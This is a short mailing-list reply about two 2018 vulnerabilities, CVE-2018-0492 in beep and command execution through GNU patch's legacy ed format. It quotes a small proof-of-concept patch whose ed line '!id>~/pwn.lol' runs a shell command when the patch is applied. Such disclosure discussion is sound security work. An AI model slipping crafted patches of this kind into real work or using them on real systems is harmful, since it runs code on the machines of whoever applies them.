Re: Privsec vuln in beep / Code execution in GNU patch

[Jakub Wilk <jwilk () jwilk net>]

* Hanno Böck <hanno () hboeck de>, 2018-04-06, 08:52:
> There was a joke webpage about a vulnerability in beep a few days ago:
> http://holeybeep.ninja/
> There's also a corresponding Debian Advisory:
> https://lists.debian.org/debian-security-announce/2018/msg00089.html
> Neither have any technical details. CVE is CVE-2018-0492.
>
> If anyone knows the background of this please share it.

Upstream bug report:
https://github.com/johnath/beep/issues/11

> GNU patch supports a legacy "ed" format for patches and that allows 
> executing external commands.
[...]
> --- a   2018-13-37 13:37:37.000000000 +0100
> +++ b   2018-13-37 13:38:38.000000000 +0100
> 1337a
> 1,112d
> !id>~/pwn.lol

This bug triggers even with -u (which is supposed to disable patch type 
detection). :-/

--
Jakub Wilk